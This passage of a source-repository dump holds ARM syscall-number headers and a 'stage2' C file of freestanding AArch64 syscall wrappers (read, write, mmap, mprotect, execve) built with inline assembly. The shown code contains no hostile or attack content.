(__NR_SYSCALL_BASE+273) 302 | #define __NR_mq_open (__NR_SYSCALL_BASE+274) 303 | #define __NR_mq_unlink (__NR_SYSCALL_BASE+275) 304 | #define __NR_mq_timedsend (__NR_SYSCALL_BASE+276) 305 | #define __NR_mq_timedreceive (__NR_SYSCALL_BASE+277) 306 | #define __NR_mq_notify (__NR_SYSCALL_BASE+278) 307 | #define __NR_mq_getsetattr (__NR_SYSCALL_BASE+279) 308 | #define __NR_waitid (__NR_SYSCALL_BASE+280) 309 | #define __NR_socket (__NR_SYSCALL_BASE+281) 310 | #define __NR_bind (__NR_SYSCALL_BASE+282) 311 | #define __NR_connect (__NR_SYSCALL_BASE+283) 312 | #define __NR_listen (__NR_SYSCALL_BASE+284) 313 | #define __NR_accept (__NR_SYSCALL_BASE+285) 314 | #define __NR_getsockname (__NR_SYSCALL_BASE+286) 315 | #define __NR_getpeername (__NR_SYSCALL_BASE+287) 316 | #define __NR_socketpair (__NR_SYSCALL_BASE+288) 317 | #define __NR_send (__NR_SYSCALL_BASE+289) 318 | #define __NR_sendto (__NR_SYSCALL_BASE+290) 319 | #define __NR_recv (__NR_SYSCALL_BASE+291) 320 | #define __NR_recvfrom (__NR_SYSCALL_BASE+292) 321 | #define __NR_shutdown (__NR_SYSCALL_BASE+293) 322 | #define __NR_setsockopt (__NR_SYSCALL_BASE+294) 323 | #define __NR_getsockopt (__NR_SYSCALL_BASE+295) 324 | #define __NR_sendmsg (__NR_SYSCALL_BASE+296) 325 | #define __NR_recvmsg (__NR_SYSCALL_BASE+297) 326 | #define __NR_semop (__NR_SYSCALL_BASE+298) 327 | #define __NR_semget (__NR_SYSCALL_BASE+299) 328 | #define __NR_semctl (__NR_SYSCALL_BASE+300) 329 | #define __NR_msgsnd (__NR_SYSCALL_BASE+301) 330 | #define __NR_msgrcv (__NR_SYSCALL_BASE+302) 331 | #define __NR_msgget (__NR_SYSCALL_BASE+303) 332 | #define __NR_msgctl (__NR_SYSCALL_BASE+304) 333 | #define __NR_shmat (__NR_SYSCALL_BASE+305) 334 | #define __NR_shmdt (__NR_SYSCALL_BASE+306) 335 | #define __NR_shmget (__NR_SYSCALL_BASE+307) 336 | #define __NR_shmctl (__NR_SYSCALL_BASE+308) 337 | #define __NR_add_key (__NR_SYSCALL_BASE+309) 338 | #define __NR_request_key (__NR_SYSCALL_BASE+310) 339 | #define __NR_keyctl (__NR_SYSCALL_BASE+311) 340 | #define __NR_semtimedop (__NR_SYSCALL_BASE+312) 341 | #define __NR_vserver (__NR_SYSCALL_BASE+313) 342 | #define __NR_ioprio_set (__NR_SYSCALL_BASE+314) 343 | #define __NR_ioprio_get (__NR_SYSCALL_BASE+315) 344 | #define __NR_inotify_init (__NR_SYSCALL_BASE+316) 345 | #define __NR_inotify_add_watch (__NR_SYSCALL_BASE+317) 346 | #define __NR_inotify_rm_watch (__NR_SYSCALL_BASE+318) 347 | #define __NR_mbind (__NR_SYSCALL_BASE+319) 348 | #define __NR_get_mempolicy (__NR_SYSCALL_BASE+320) 349 | #define __NR_set_mempolicy (__NR_SYSCALL_BASE+321) 350 | #define __NR_openat (__NR_SYSCALL_BASE+322) 351 | #define __NR_mkdirat (__NR_SYSCALL_BASE+323) 352 | #define __NR_mknodat (__NR_SYSCALL_BASE+324) 353 | #define __NR_fchownat (__NR_SYSCALL_BASE+325) 354 | #define __NR_futimesat (__NR_SYSCALL_BASE+326) 355 | #define __NR_fstatat64 (__NR_SYSCALL_BASE+327) 356 | #define __NR_unlinkat (__NR_SYSCALL_BASE+328) 357 | #define __NR_renameat (__NR_SYSCALL_BASE+329) 358 | #define __NR_linkat (__NR_SYSCALL_BASE+330) 359 | #define __NR_symlinkat (__NR_SYSCALL_BASE+331) 360 | #define __NR_readlinkat (__NR_SYSCALL_BASE+332) 361 | #define __NR_fchmodat (__NR_SYSCALL_BASE+333) 362 | #define __NR_faccessat (__NR_SYSCALL_BASE+334) 363 | #define __NR_pselect6 (__NR_SYSCALL_BASE+335) 364 | #define __NR_ppoll (__NR_SYSCALL_BASE+336) 365 | #define __NR_unshare (__NR_SYSCALL_BASE+337) 366 | #define __NR_set_robust_list (__NR_SYSCALL_BASE+338) 367 | #define __NR_get_robust_list (__NR_SYSCALL_BASE+339) 368 | #define __NR_splice (__NR_SYSCALL_BASE+340) 369 | #define __NR_arm_sync_file_range (__NR_SYSCALL_BASE+341) 370 | #define __NR_sync_file_range2 __NR_arm_sync_file_range 371 | #define __NR_tee (__NR_SYSCALL_BASE+342) 372 | #define __NR_vmsplice (__NR_SYSCALL_BASE+343) 373 | #define __NR_move_pages (__NR_SYSCALL_BASE+344) 374 | #define __NR_getcpu (__NR_SYSCALL_BASE+345) 375 | #define __NR_epoll_pwait (__NR_SYSCALL_BASE+346) 376 | #define __NR_kexec_load (__NR_SYSCALL_BASE+347) 377 | #define __NR_utimensat (__NR_SYSCALL_BASE+348) 378 | #define __NR_signalfd (__NR_SYSCALL_BASE+349) 379 | #define __NR_timerfd_create (__NR_SYSCALL_BASE+350) 380 | #define __NR_eventfd (__NR_SYSCALL_BASE+351) 381 | #define __NR_fallocate (__NR_SYSCALL_BASE+352) 382 | #define __NR_timerfd_settime (__NR_SYSCALL_BASE+353) 383 | #define __NR_timerfd_gettime (__NR_SYSCALL_BASE+354) 384 | #define __NR_signalfd4 (__NR_SYSCALL_BASE+355) 385 | #define __NR_eventfd2 (__NR_SYSCALL_BASE+356) 386 | #define __NR_epoll_create1 (__NR_SYSCALL_BASE+357) 387 | #define __NR_dup3 (__NR_SYSCALL_BASE+358) 388 | #define __NR_pipe2 (__NR_SYSCALL_BASE+359) 389 | #define __NR_inotify_init1 (__NR_SYSCALL_BASE+360) 390 | #define __NR_preadv (__NR_SYSCALL_BASE+361) 391 | #define __NR_pwritev (__NR_SYSCALL_BASE+362) 392 | #define __NR_rt_tgsigqueueinfo (__NR_SYSCALL_BASE+363) 393 | #define __NR_perf_event_open (__NR_SYSCALL_BASE+364) 394 | #define __NR_recvmmsg (__NR_SYSCALL_BASE+365) 395 | #define __NR_accept4 (__NR_SYSCALL_BASE+366) 396 | #define __NR_fanotify_init (__NR_SYSCALL_BASE+367) 397 | #define __NR_fanotify_mark (__NR_SYSCALL_BASE+368) 398 | #define __NR_prlimit64 (__NR_SYSCALL_BASE+369) 399 | #define __NR_name_to_handle_at (__NR_SYSCALL_BASE+370) 400 | #define __NR_open_by_handle_at (__NR_SYSCALL_BASE+371) 401 | #define __NR_clock_adjtime (__NR_SYSCALL_BASE+372) 402 | #define __NR_syncfs (__NR_SYSCALL_BASE+373) 403 | #define __NR_sendmmsg (__NR_SYSCALL_BASE+374) 404 | #define __NR_setns (__NR_SYSCALL_BASE+375) 405 | #define __NR_process_vm_readv (__NR_SYSCALL_BASE+376) 406 | #define __NR_process_vm_writev (__NR_SYSCALL_BASE+377) 407 | #define __NR_kcmp (__NR_SYSCALL_BASE+378) 408 | #define __NR_finit_module (__NR_SYSCALL_BASE+379) 409 | #define __NR_sched_setattr (__NR_SYSCALL_BASE+380) 410 | #define __NR_sched_getattr (__NR_SYSCALL_BASE+381) 411 | #define __NR_renameat2 (__NR_SYSCALL_BASE+382) 412 | #define __NR_memfd_create (__NR_SYSCALL_BASE+385) 413 | 414 | /* 415 | * The following SWIs are ARM private. 416 | */ 417 | #define __ARM_NR_BASE (__NR_SYSCALL_BASE+0x0f0000) 418 | #define __ARM_NR_breakpoint (__ARM_NR_BASE+1) 419 | #define __ARM_NR_cacheflush (__ARM_NR_BASE+2) 420 | #define __ARM_NR_usr26 (__ARM_NR_BASE+3) 421 | #define __ARM_NR_usr32 (__ARM_NR_BASE+4) 422 | #define __ARM_NR_set_tls (__ARM_NR_BASE+5) 423 | 424 | /* 425 | * The following syscalls are obsolete and no longer available for EABI. 426 | */ 427 | #if defined(__ARM_EABI__) 428 | #undef __NR_time 429 | #undef __NR_umount 430 | #undef __NR_stime 431 | #undef __NR_alarm 432 | #undef __NR_utime 433 | #undef __NR_getrlimit 434 | #undef __NR_select 435 | #undef __NR_readdir 436 | #undef __NR_mmap 437 | #undef __NR_socketcall 438 | #undef __NR_syscall 439 | #undef __NR_ipc 440 | #endif 441 | 442 | #endif /* _SYMB__ASM_ARM_UNISTD_H */ 443 | -------------------------------------------------------------------------------- /stage2/syscall_arm_64.c: -------------------------------------------------------------------------------- 1 | #include "syscall_arm_64.h" 2 | #include "linuxdefs.h" 3 | 4 | ssize_t _read(int fd, void *buf, size_t size) 5 | { 6 | ssize_t ret; 7 | register long x0 asm ("x0") = (long)fd; 8 | register long x1 asm ("x1") = (long)buf; 9 | register long x2 asm ("x2") = (long)size; 10 | register long x8 asm ("x8") = __NR_read; 11 | 12 | asm volatile 13 | ( 14 | "svc #0; mov %0, x0" 15 | : "=r" (ret) 16 | : "r"(x8), "r"(x0), "r"(x1), "r"(x2) 17 | ); 18 | return ret; 19 | } 20 | 21 | ssize_t _write(int fd, const void *buf, size_t size) 22 | { 23 | ssize_t ret; 24 | register long x0 asm ("x0") = (long)fd; 25 | register long x1 asm ("x1") = (long)buf; 26 | register long x2 asm ("x2") = (long)size; 27 | register long x8 asm ("x8") = __NR_write; 28 | 29 | asm volatile 30 | ( 31 | "svc #0; mov %0, x0" 32 | : "=r" (ret) 33 | : "r"(x8), "r"(x0), "r"(x1), "r"(x2) 34 | ); 35 | return ret; 36 | } 37 | 38 | int _open(char * path, int mode, int flags) 39 | { 40 | long ret; 41 | register long x0 asm ("x0") = (long)path; 42 | register long x1 asm ("x1") = (long)mode; 43 | register long x2 asm ("x2") = (long)flags; 44 | register long x8 asm ("x8") = __NR_open; 45 | 46 | asm volatile 47 | ( 48 | "svc #0; mov %0, x0" 49 | : "=r" (ret) 50 | : "r"(x8), "r"(x0), "r"(x1), "r"(x2) 51 | ); 52 | return ret; 53 | } 54 | 55 | int _close(int fd) 56 | { 57 | long ret; 58 | register long x0 asm ("x0") = (long)fd; 59 | register long x8 asm ("x8") = __NR_close; 60 | 61 | asm volatile 62 | ( 63 | "svc #0; mov %0, x0" 64 | : "=r" (ret) 65 | : "r"(x8), "r"(x0) 66 | ); 67 | return ret; 68 | } 69 | 70 | long _lseek(int fd, long offset, int whence) 71 | { 72 | long ret; 73 | register long x0 asm ("x0") = (long)fd; 74 | register long x1 asm ("x1") = (long)offset; 75 | register long x2 asm ("x2") = (long)whence; 76 | register long x8 asm ("x8") = __NR_lseek; 77 | 78 | asm volatile 79 | ( 80 | "svc #0; mov %0, x0" 81 | : "=r" (ret) 82 | : "r"(x8), "r"(x0), "r"(x1), "r"(x2) 83 | ); 84 | return ret; 85 | } 86 | 87 | void * _mmap(void * start, long length, int prot, int flags, int fd, long offset) 88 | { 89 | void * ret; 90 | register long x0 asm ("x0") = (long)start; 91 | register long x1 asm ("x1") = (long)length; 92 | register long x2 asm ("x2") = (long)prot; 93 | register long x3 asm ("x3") = (long)flags; 94 | register long x4 asm ("x4") = (long)fd; 95 | register long x5 asm ("x5") = (long)offset; 96 | register long x8 asm ("x8") = __NR_mmap; 97 | 98 | asm volatile 99 | ( 100 | "svc #0; mov %0, x0" 101 | : "=r" (ret) 102 | : "r"(x8), "r"(x0), "r"(x1), "r"(x2), "r"(x3), "r"(x4), "r"(x5) 103 | ); 104 | return ret; 105 | } 106 | 107 | long _mprotect(void * addr, long len, int prot) 108 | { 109 | long ret; 110 | register long x0 asm ("x0") = (long)addr; 111 | register long x1 asm ("x1") = (long)len; 112 | register long x2 asm ("x2") = (long)prot; 113 | register long x8 asm ("x8") = __NR_mprotect; 114 | 115 | asm volatile 116 | ( 117 | "svc #0; mov %0, x0" 118 | : "=r" (ret) 119 | : "r"(x8), "r"(x0), "r"(x1), "r"(x2) 120 | ); 121 | return ret; 122 | } 123 | 124 | long _munmap(char * start, int length) 125 | { 126 | long ret; 127 | register long x0 asm ("x0") = (long)start; 128 | register long x1 asm ("x1") = (long)length; 129 | register long x8 asm ("x8") = __NR_munmap; 130 | 131 | asm volatile 132 | ( 133 | "svc #0; mov %0, x0" 134 | : "=r" (ret) 135 | : "r"(x8), "r"(x0), "r"(x1) 136 | ); 137 | return ret; 138 | } 139 | 140 | long _brk(unsigned long addr) 141 | { 142 | long ret; 143 | register long x0 asm ("x0") = (long)addr; 144 | register long x8 asm ("x8") = __NR_brk; 145 | 146 | asm volatile 147 | ( 148 | "svc #0; mov %0, x0" 149 | : "=r" (ret) 150 | : "r"(x8), "r"(x0) 151 | ); 152 | return ret; 153 | } 154 | 155 | int _exit(int level) 156 | { 157 | long ret; 158 | register long x0 asm ("x0") = (long)level; 159 | register long x8 asm ("x8") = __NR_exit; 160 | 161 | asm volatile 162 | ( 163 | "svc #0; mov %0, x0" 164 | : "=r" (ret) 165 | : "r"(x8), "r"(x0) 166 | ); 167 | return ret; 168 | } 169 | 170 | void raise(void) 171 | { 172 | _exit(-1); 173 | } 174 | 175 | long _execve(char * filename, char ** argv, char ** envp) 176 | { 177 | long ret; 178 | register long x0 asm ("x0") = (long)filename; 179 | register long x1 asm ("x1") = (long)argv; 180 | register long x2 asm ("x2") = (long)envp; 181 | register long x8 asm ("x8") = __NR_execve; 182 | 183 | asm volatile 184 | ( 185 | "svc #0; mov %0, x0" 186 | : "=r" (ret) 187 | : "r"(x8), "r"(x0), "r"(x1), "r"(x2) 188 | ); 189 | return ret; 190 | } 191 | -------------------------------------------------------------------------------- /stage2/syscall_arm_64.h: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | /* 4 | * This file contains the system call numbers, based on the 5 | * layout of the x86-64 architecture, which embeds the 6 | * pointer to the syscall in the table. 7 | * 8 | * As a basic principle, no duplication of functionality 9 | * should be added, e.g. we don't use lseek when llseek 10 | * is present. New architectures should use this file 11 | * and implement the less feature-full calls in user space. 12 | */ 13 | 14 | #ifndef __SYSCALL 15 | #define __SYSCALL(x, y) 16 | #endif 17 | 18 | #if __BITS_PER_LONG == 32 || defined(__SYSCALL_COMPAT) 19 | #define __SC_3264(_nr, _32, _64) __SYSCALL(_nr, _32) 20 | #else 21 | #define __SC_3264(_nr, _32, _64) __SYSCALL(_nr, _64) 22 | #endif 23 | 24 | #ifdef __SYSCALL_COMPAT 25 | #define __SC_COMP(_nr, _sys, _comp) __SYSCALL(_nr, _comp) 26 | #define __SC_COMP_3264(_nr, _32, _64, _comp) __SYSCALL(_nr, _comp) 27 | #else 28 | #define __SC_COMP(_nr, _sys, _comp) __SYSCALL(_nr, _sys) 29 | #define __SC_COMP_3264(_nr, _32, _64, _comp) __SC_3264(_nr, _32, _64) 30 | #endif 31 | 32 | #define __NR_io_setup 0 33 | __SC_COMP(__NR_io_setup, sys_io_setup, compat_sys_io_setup) 34 | #define __NR_io_destroy 1 35 | __SYSCALL(__NR_io_destroy, sys_io_destroy) 36 | #define __NR_io_submit 2 37 | __SC_COMP(__NR_io_submit, sys_io_submit, compat_sys_io_submit) 38 | #define __NR_io_cancel 3 39 | __SYSCALL(__NR_io_cancel, sys_io_cancel) 40 | #define __NR_io_getevents 4 41 | __SC_COMP(__NR_io_getevents, sys_io_getevents, compat_sys_io_getevents) 42 | 43 | /* fs/xattr.c */ 44 | #define __NR_setxattr 5 45 | __SYSCALL(__NR_setxattr, sys_setxattr) 46 | #define __NR_lsetxattr 6 47 | __SYSCALL(__NR_lsetxattr, sys_lsetxattr) 48 | #define __NR_fsetxattr 7 49 | __SYSCALL(__NR_fsetxattr, sys_fsetxattr) 50 | #define __NR_getxattr 8 51 | __SYSCALL(__NR_getxattr, sys_getxattr) 52 | #define __NR_lgetxattr 9 53 | __SYSCALL(__NR_lgetxattr, sys_lgetxattr) 54 | #define __NR_fgetxattr 10 55 | __SYSCALL(__NR_fgetxattr, sys_fgetxattr) 56 | #define __NR_listxattr 11 57 | __SYSCALL(__NR_listxattr, sys_listxattr) 58 | #define __NR_llistxattr 12 59 | __SYSCALL(__NR_llistxattr, sys_llistxattr) 60 | #define __NR_flistxattr 13 61 | __SYSCALL(__NR_flistxattr, sys_flistxattr) 62 | #define __NR_removexattr 14 63 | __SYSCALL(__NR_removexattr, sys_removexattr) 64 | #define __NR_lremovexattr 15 65 | __SYSCALL(__NR_lremovexattr, sys_lremovexattr) 66 | #define __NR_fremovexattr 16 67 | __SYSCALL(__NR_fremovexattr, sys_fremovexattr) 68 | 69 | /* fs/dcache.c */ 70 | #define __NR_getcwd 17 71 | __SYSCALL(__NR_getcwd, sys_getcwd) 72 | 73 | /* fs/cookies.c */ 74 | #define __NR_lookup_dcookie 18 75 | __SC_COMP(__NR_lookup_dcookie, sys_lookup_dcookie, compat_sys_lookup_dcookie) 76 | 77 | /* fs/eventfd.c */ 78 | #define __NR_eventfd2 19 79 | __SYSCALL(__NR_eventfd2, sys_eventfd2) 80 | 81 | /* fs/eventpoll.c */ 82 | #define __NR_epoll_create1 20 83 | __SYSCALL(__NR_epoll_create1, sys_epoll_create1) 84 | #define __NR_epoll_ctl 21 85 | __SYSCALL(__NR_epoll_ctl, sys_epoll_ctl) 86 | #define __NR_epoll_pwait 22 87 | __SC_COMP(__NR_epoll_pwait, sys_epoll_pwait, compat_sys_epoll_pwait) 88 | 89 | /* fs/fcntl.c */ 90 | #define __NR_dup 23 91 | __SYSCALL(__NR_dup, sys_dup) 92 | #define __NR_dup3 24 93 | __SYSCALL(__NR_dup3, sys_dup3) 94 | #define __NR3264_fcntl 25 95 | __SC_COMP_3264(__NR3264_fcntl, sys_fcntl64, sys_fcntl, compat_sys_fcntl64) 96 | 97 | /* fs/inotify_user.c */ 98 | #define __NR_inotify_init1 26 99 | __SYSCALL(__NR_inotify_init1, sys_inotify_init1) 100 | #define __NR_inotify_add_watch 27 101 | __SYSCALL(__NR_inotify_add_watch, sys_inotify_add_watch) 102 | #define __NR_inotify_rm_watch 28 103 | __SYSCALL(__NR_inotify_rm_watch, sys_inotify_rm_watch) 104 | 105 | /* fs/ioctl.c */ 106 | #define __NR_ioctl 29 107 | __SC_COMP(__NR_ioctl, sys_ioctl, compat_sys_ioctl) 108 | 109 | /* fs/ioprio.c */ 110 | #define __NR_ioprio_set 30 111 | __SYSCALL(__NR_ioprio_set, sys_ioprio_set) 112 | #define __NR_ioprio_get 31 113 | __SYSCALL(__NR_ioprio_get, sys_ioprio_get) 114 | 115 | /* fs/locks.c */ 116 | #define __NR_flock 32 117 | __SYSCALL(__NR_flock, sys_flock) 118 | 119 | /* fs/namei.c */ 120 | #define __NR_mknodat 33 121 | __SYSCALL(__NR_mknodat, sys_mknodat) 122 | #define __NR_mkdirat 34 123 | __SYSCALL(__NR_mkdirat, sys_mkdirat) 124 | #define __NR_unlinkat 35 125 | __SYSCALL(__NR_unlinkat, sys_unlinkat) 126 | #define __NR_symlinkat 36 127 | __SYSCALL(__NR_symlinkat, sys_symlinkat) 128 | #define __NR_linkat 37 129 | __SYSCALL(__NR_linkat, sys_linkat) 130 | #define __NR_renameat 38 131 | __SYSCALL(__NR_renameat, sys_renameat) 132 | 133 | /* fs/namespace.c */ 134 | #define __NR_umount2 39 135 | __SYSCALL(__NR_umount2, sys_umount) 136 | #define __NR_mount 40 137 | __SC_COMP(__NR_mount, sys_mount, compat_sys_mount) 138 | #define __NR_pivot_root 41 139 | __SYSCALL(__NR_pivot_root, sys_pivot_root) 140 | 141 | /* fs/nfsctl.c */ 142 | #define __NR_nfsservctl 42 143 | __SYSCALL(__NR_nfsservctl, sys_ni_syscall) 144 | 145 | /* fs/open.c */ 146 | #define __NR3264_statfs 43 147 | __SC_COMP_3264(__NR3264_statfs, sys_statfs64, sys_statfs, \ 148 | compat_sys_statfs64) 149 | #define __NR3264_fstatfs 44 150 | __SC_COMP_3264(__NR3264_fstatfs, sys_fstatfs64, sys_fstatfs, \ 151 | compat_sys_fstatfs64) 152 | #define __NR3264_truncate 45 153 | __SC_COMP_3264(__NR3264_truncate, sys_truncate64, sys_truncate, \ 154 | compat_sys_truncate64) 155 | #define __NR3264_ftruncate 46 156 | __SC_COMP_3264(__NR3264_ftruncate, sys_ftruncate64, sys_ftruncate, \ 157 | compat_sys_ftruncate64) 158 | 159 | #define __NR_fallocate 47 160 | __SC_COMP(__NR_fallocate, sys_fallocate, compat_sys_fallocate) 161 | #define __NR_faccessat 48 162 | __SYSCALL(__NR_faccessat, sys_faccessat) 163 | #define __NR_chdir 49 164 | __SYSCALL(__NR_chdir, sys_chdir) 165 | #define __NR_fchdir 50 166 | __SYSCALL(__NR_fchdir, sys_fchdir) 167 | #define __NR_chroot 51 168 | __SYSCALL(__NR_chroot, sys_chroot) 169 | #define __NR_fchmod 52 170 | __SYSCALL(__NR_fchmod, sys_fchmod) 171 | #define __NR_fchmodat 53 172 | __SYSCALL(__NR_fchmodat, sys_fchmodat) 173 | #define __NR_fchownat 54 174 | __SYSCALL(__NR_fchownat, sys_fchownat) 175 | #define __NR_fchown 55 176 | __SYSCALL(__NR_fchown, sys_fchown) 177 | #define __NR_openat 56 178 | __SC_COMP(__NR_openat, sys_openat, compat_sys_openat) 179 | #define __NR_close 57 180 | __SYSCALL(__NR_close, sys_close) 181 | #define __NR_vhangup 58 182 | __SYSCALL(__NR_vhangup, sys_vhangup) 183 | 184 | /* fs/pipe.c */ 185 | #define __NR_pipe2 59 186 | __SYSCALL(__NR_pipe2, sys_pipe2) 187 | 188 | /* fs/quota.c */ 189 | #define __NR_quotactl 60 190 | __SYSCALL(__NR_quotactl, sys_quotactl) 191 | 192 | /* fs/readdir.c */ 193 | #define __NR_getdents64 61 194 | #define __ARCH_WANT_COMPAT_SYS_GETDENTS64 195 | __SC_COMP(__NR_getdents64, sys_getdents64, compat_sys_getdents64) 196 | 197 | /* fs/read_write.c */ 198 | #define __NR3264_lseek 62 199 | __SC_3264(__NR3264_lseek, sys_llseek, sys_lseek) 200 | #define __NR_read 63 201 | __SYSCALL(__NR_read, sys_read) 202 | #define __NR_write 64 203 | __SYSCALL(__NR_write, sys_write) 204 | #define __NR_readv 65 205 | __SC_COMP(__NR_readv, sys_readv, compat_sys_readv) 206 | #define __NR_writev 66 207 | __SC_COMP(__NR_writev, sys_writev, compat_sys_writev) 208 | #define __NR_pread64 67 209 | __SC_COMP(__NR_pread64, sys_pread64, compat_sys_pread64) 210 | #define __NR_pwrite64 68 211 | __SC_COMP(__NR_pwrite64, sys_pwrite64, compat_sys_pwrite64) 212 | #define __NR_preadv 69 213 | __SC_COMP(__NR_preadv, sys_preadv, compat_sys_preadv) 214 | #define __NR_pwritev 70 215 | __SC_COMP(__NR_pwritev, sys_pwritev, compat_sys_pwritev) 216 | 217 | /* fs/sendfile.c */ 218 | #define __NR3264_sendfile 71 219 | __SYSCALL(__NR3264_sendfile, sys_sendfile64) 220 | 221 | /* fs/select.c */ 222 | #define __NR_pselect6 72 223 | __SC_COMP(__NR_pselect6, sys_pselect6, compat_sys_pselect6) 224 | #define __NR_ppoll 73 225 | __SC_COMP(__NR_ppoll, sys_ppoll, compat_sys_ppoll) 226 | 227 | /* fs/signalfd.c */ 228 | #define __NR_signalfd4 74 229 | __SC_COMP(__NR_signalfd4, sys_signalfd4, compat_sys_signalfd4) 230 | 231 | /* fs/splice.c */ 232 | #define __NR_vmsplice 75 233 | __SC_COMP(__NR_vmsplice, sys_vmsplice, compat_sys_vmsplice) 234 | #define __NR_splice 76 235 | __SYSCALL(__NR_splice, sys_splice) 236 | #define __NR_tee 77 237 | __SYSCALL(__NR_tee, sys_tee) 238 | 239 | /* fs/stat.c */ 240 | #define __NR_readlinkat 78 241 | __SYSCALL(__NR_readlinkat, sys_readlinkat) 242 | #define __NR3264_fstatat 79 243 | __SC_3264(__NR3264_fstatat, sys_fstatat64, sys_newfstatat) 244 | #define __NR3264_fstat 80 245 | __SC_3264(__NR3264_fstat, sys_fstat64, sys_newfstat) 246 | 247 | /* fs/sync.c */ 248 | #define __NR_sync 81 249 | __SYSCALL(__NR_sync, sys_sync) 250 | #define __NR_fsync 82 251 | __SYSCALL(__NR_fsync, sys_fsync) 252 | #define __NR_fdatasync 83 253 | __SYSCALL(__NR_fdatasync, sys_fdatasync) 254 | #ifdef __ARCH_WANT_SYNC_FILE_RANGE2 255 | #define __NR_sync_file_range2 84 256 | __SC_COMP(__NR_sync_file_range2, sys_sync_file_range2, \ 257 | compat_sys_sync_file_range2) 258 | #else 259 | #define __NR_sync_file_range 84 260 | __SC_COMP(__NR_sync_file_range, sys_sync_file_range, \ 261 | compat_sys_sync_file_range) 262 | #endif 263 | 264 | /* fs/timerfd.c */ 265 | #define __NR_timerfd_create 85 266 | __SYSCALL(__NR_timerfd_create, sys_timerfd_create) 267 | #define __NR_timerfd_settime 86 268 | __SC_COMP(__NR_timerfd_settime, sys_timerfd_settime, \ 269 | compat_sys_timerfd_settime) 270 | #define __NR_timerfd_gettime 87 271 | __SC_COMP(__NR_timerfd_gettime, sys_timerfd_gettime, \ 272 | compat_sys_timerfd_gettime) 273 | 274 | /* fs/utimes.c */ 275 | #define __NR_utimensat 88 276 | __SC_COMP(__NR_utimensat, sys_utimensat, compat_sys_utimensat) 277 | 278 | /* kernel/acct.c */ 279 | #define __NR_acct 89 280 | __SYSCALL(__NR_acct, sys_acct) 281 | 282 | /* kernel/capability.c */ 283 | #define __NR_capget 90 284 | __SYSCALL(__NR_capget, sys_capget) 285 | #define __NR_capset 91 286 | __SYSCALL(__NR_capset, sys_capset) 287 | 288 | /* kernel/exec_domain.c */ 289 | #define __NR_personality 92 290 | __SYSCALL(__NR_personality, sys_personality) 291 | 292 | /* kernel/exit.c */ 293 | #define __NR_exit 93 294 | __SYSCALL(__NR_exit, sys_exit) 295 | #define __NR_exit_group 94 296 | __SYSCALL(__NR_exit_group, sys_exit_group) 297 | #define __NR_waitid 95 298 | __SC_COMP(__NR_waitid, sys_waitid, compat_sys_waitid) 299 | 300 | /* kernel/fork.c */ 301 | #define __NR_set_tid_address 96 302 | __SYSCALL(__NR_set_tid_address, sys_set_tid_address) 303 | #define __NR_unshare 97 304 | __SYSCALL(__NR_unshare, sys_unshare) 305 | 306 | /* kernel/futex.c */ 307 | #define __NR_futex 98 308 | __SC_COMP(__NR_futex, sys_futex, compat_sys_futex) 309 | #define __NR_set_robust_list 99 310 | __SC_COMP(__NR_set_robust_list, sys_set_robust_list, \ 311 | compat_sys_set_robust_list) 312 | #define __NR_get_robust_list 100 313 | __SC_COMP(__NR_get_robust_list, sys_get_robust_list, \ 314 | compat_sys_get_robust_list) 315 | 316 | /* kernel/hrtimer.c */ 317 | #define __NR_nanosleep 101 318 | __SC_COMP(__NR_nanosleep, sys_nanosleep, compat_sys_nanosleep) 319 | 320 | /* kernel/itimer.c */ 321 | #define __NR_getitimer 102 322 | __SC_COMP(__NR_getitimer, sys_getitimer, compat_sys_getitimer) 323 | #define __NR_setitimer 103 324 | __SC_COMP(__NR_setitimer, sys_setitimer, compat_sys_setitimer) 325 | 326 | /* kernel/kexec.c */ 327 | #define __NR_kexec_load 104 328 | __SC_COMP(__NR_kexec_load, sys_kexec_load, compat_sys_kexec_load) 329 | 330 | /* kernel/module.c */ 331 | #define __NR_init_module 105 332 | __SYSCALL(__NR_init_module, sys_init_module) 333 | #define __NR_delete_module 106 334 | __SYSCALL(__NR_delete_module, sys_delete_module) 335 | 336 | /* kernel/posix-timers.c */ 337 | #define __NR_timer_create 107 338 | __SC_COMP(__NR_timer_create, sys_timer_create, compat_sys_timer_create) 339 | #define __NR_timer_gettime 108 340 | __SC_COMP(__NR_timer_gettime, sys_timer_gettime, compat_sys_timer_gettime) 341 | #define __NR_timer_getoverrun 109 342 | __SYSCALL(__NR_timer_getoverrun, sys_timer_getoverrun) 343 | #define __NR_timer_settime 110 344 | __SC_COMP(__NR_timer_settime, sys_timer_settime, compat_sys_timer_settime) 345 | #define __NR_timer_delete 111 346 | __SYSCALL(__NR_timer_delete, sys_timer_delete) 347 | #define __NR_clock_settime 112 348 | __SC_COMP(__NR_clock_settime, sys_clock_settime, compat_sys_clock_settime) 349 | #define __NR_clock_gettime 113 350 | __SC_COMP(__NR_clock_gettime, sys_clock_gettime, compat_sys_clock_gettime) 351 | #define __NR_clock_getres 114 352 | __SC_COMP(__NR_clock_getres, sys_clock_getres, compat_sys_clock_getres) 353 | #define __NR_clock_nanosleep 115 354 | __SC_COMP(__NR_clock_nanosleep, sys_clock_nanosleep, \ 355 | compat_sys_clock_nanosleep) 356 | 357 | /* kernel/printk.c */ 358 | #define __NR_syslog 116 359 | __SYSCALL(__NR_syslog, sys_syslog) 360 | 361 | /* kernel/ptrace.c */ 362 | #define __NR_ptrace 117 363 | __SYSCALL(__NR_ptrace, sys_ptrace) 364 | 365 | /* kernel/sched/core.c */ 366 | #define __NR_sched_setparam 118 367 | __SYSCALL(__NR_sched_setparam, sys_sched_setparam) 368 | #define __NR_sched_setscheduler 119 369 | __SYSCALL(__NR_sched_setscheduler, sys_sched_setscheduler) 370 | #define __NR_sched_getscheduler 120 371 | __SYSCALL(__NR_sched_getscheduler, sys_sched_getscheduler) 372 | #define __NR_sched_getparam 121 373 | __SYSCALL(__NR_sched_getparam, sys_sched_getparam) 374 | #define __NR_sched_setaffinity 122 375 | __SC_COMP(__NR_sched_setaffinity, sys_sched_setaffinity, \ 376 | compat_sys_sched_setaffinity) 377 | #define __NR_sched_getaffinity 123 378 | __SC_COMP(__NR_sched_getaffinity, sys_sched_getaffinity, \ 379 | compat_sys_sched_getaffinity) 380 | #define __NR_sched_yield 124 381 | __SYSCALL(__NR_sched_yield, sys_sched_yield) 382 | #define __NR_sched_get_priority_max 125 383 | __SYSCALL(__NR_sched_get_priority_max, sys_sched_get_priority_max) 384 | #define __NR_sched_get_priority_min 126 385 | __SYSCALL(__NR_sched_get_priority_min, sys_sched_get_priority_min) 386 | #define __NR_sched_rr_get_interval 127 387 